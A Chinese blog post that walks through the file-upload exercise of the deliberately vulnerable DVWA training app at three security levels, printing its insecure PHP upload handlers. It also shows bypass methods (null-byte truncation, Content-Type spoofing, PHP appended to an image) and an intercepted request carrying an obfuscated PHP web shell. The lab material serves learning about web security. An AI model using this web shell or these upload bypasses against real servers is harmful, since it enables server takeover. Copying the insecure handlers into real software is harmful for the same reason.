DWVA上传漏洞挖掘的测试例子
发布:smiling 来源: PHP粉丝网 添加日期:2018-10-15 09:45:20 浏览: 评论:0
low:
- <?php
- if( isset( $_POST[ 'Upload' ] ) ) {
- // Where are we going to be writing to?
- $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
- $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
- // Can we move the file to the upload folder?
- if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
- // No
- echo '<pre>Your image was not uploaded.</pre>';
- }
- else {
- // Yes!
- echo "<pre>{$target_path} succesfully uploaded!</pre>";
- }
- }
- ?>
没有对文件类型进行限制,直接将php文件上传,之后访问:http://localhost/hackable/uploads/XX.php即可。
medium:
- <?php
- if( isset( $_POST[ 'Upload' ] ) ) {
- // Where are we going to be writing to?
- $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
- $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
- // File information
- $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
- $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
- $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
- // Is it an image?
- if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
- ( $uploaded_size < 100000 ) ) {
- // Can we move the file to the upload folder?
- if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
- // No
- echo '<pre>Your image was not uploaded.</pre>';
- }
- else {
- // Yes!
- echo "<pre>{$target_path} succesfully uploaded!</pre>";
- } //phpfensi.com
- }
- else {
- // Invalid file
- echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
- }
- }
- ?>
对上传的文件进行限制。
解决方法1:用burp suite进行00截断,将文件名改为1.php .jpg(注意中间有空格)然后在拦截中将空格改为00。
解决方法2:直接上传2.php文件之后进行拦截,数据包如下:
- POST /vulnerabilities/upload/ HTTP/1.1
- Host: localhost
- User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
- Accept-Encoding: gzip, deflate
- Referer: http://localhost/vulnerabilities/upload/
- Cookie: PHPSESSID=pgke4molj8bath1fmdh7mvt686; security=medium
- Connection: keep-alive
- Content-Type: multipart/form-data; boundary=---------------------------143381619322555
- Content-Length: 549
- -----------------------------143381619322555
- Content-Disposition: form-data; name="MAX_FILE_SIZE"
- 100000
- -----------------------------143381619322555
- Content-Disposition: form-data; name="uploaded"; filename="2.php"
- Content-Type: application/octet-stream
- <?php
- $item['wind'] = 'assert';
- $array[] = $item;
- $array[0]['wind']($_POST['loveautumn']);
- ?>
- -----------------------------143381619322555
- Content-Disposition: form-data; name="Upload"
- Upload
- -----------------------------143381619322555--
将红色的部分修改成:Content-Type: image/jpeg即可绕过。
High:
- <?php
- if( isset( $_POST[ 'Upload' ] ) ) {
- // Where are we going to be writing to?
- $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
- $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
- // File information
- $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
- $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
- $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
- $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
- // Is it an image?
- if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
- ( $uploaded_size < 100000 ) &&
- getimagesize( $uploaded_tmp ) ) {
- // Can we move the file to the upload folder?
- if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
- // No
- echo '<pre>Your image was not uploaded.</pre>';
- }
- else {
- // Yes!
- echo "<pre>{$target_path} succesfully uploaded!</pre>";
- }
- }
- else {
- // Invalid file
- echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
- }
- }
- ?>
对图片的命名和类型进行了严格的限制,那么可以用文件头欺骗的方式来解决这个问题。另外,假设文件名为1.php.png,strrpos会截取.出现的最后位置是5,之后substr从第六位开始重新命名文件名,也就是最终上传的文件名会被改成png,会被拦截掉。
首先使用记事本对正常图片文件编辑,将php一句话代码写到图片最下面,保存。这样就可以欺骗文件类型的检测。
最后对文件名的重命名进行绕过。将文件名改为1.php .png上传,用burpsuite拦截:
Content-Disposition: form-data; name="uploaded"; filename="1.php .png"部分修改为:
Content-Disposition: form-data; name="uploaded"; filename="1.php\X00.php .png"的话可以获得一个x00.php .png文件,这个是之前有php任意文件上传漏洞的文章中提到过的。对空格截断无效。目前不知道最终答案,可能是上传一个含有一句话的jpg文件之后采用文件包含来完成?暂时存疑
Tags: DWVA 漏洞挖掘
推荐文章
热门文章
最新评论文章
- 写给考虑创业的年轻程序员(10)
- PHP新手上路(一)(7)
- 惹恼程序员的十件事(5)
- PHP邮件发送例子,已测试成功(5)
- 致初学者:PHP比ASP优秀的七个理由(4)
- PHP会被淘汰吗?(4)
- PHP新手上路(四)(4)
- 如何去学习PHP?(2)
- 简单入门级php分页代码(2)
- php中邮箱email 电话等格式的验证(2)